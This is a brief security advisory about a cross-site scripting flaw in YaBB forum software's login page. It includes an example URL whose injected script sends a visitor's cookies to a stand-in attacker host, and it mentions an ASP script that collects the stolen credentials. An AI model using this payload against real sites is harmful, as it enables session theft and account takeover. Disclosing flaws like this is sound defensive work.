|
YaBB Login Cross-Site Scripting Vulnerability
The following example was submitted by Assaf Reshef and Nir Adar: http://example.com/forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>window.location.href(%22http://www.attackersite.example.com/hack.asp?%22%2Bdocument.cookie)</script> An ASP script was also provided which will receive stolen cookie-based authentication credentials. |
|
|
Privacy Statement |